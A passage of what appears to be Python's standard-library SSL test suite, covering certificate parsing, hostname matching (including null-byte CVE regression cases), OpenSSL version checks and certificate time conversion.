(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Jan 17 19:09:06 2028 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': 'F9BA076D5B6ABD9B',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 28 19:09:06 2027 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': '82EDBF41C880919C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
client_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
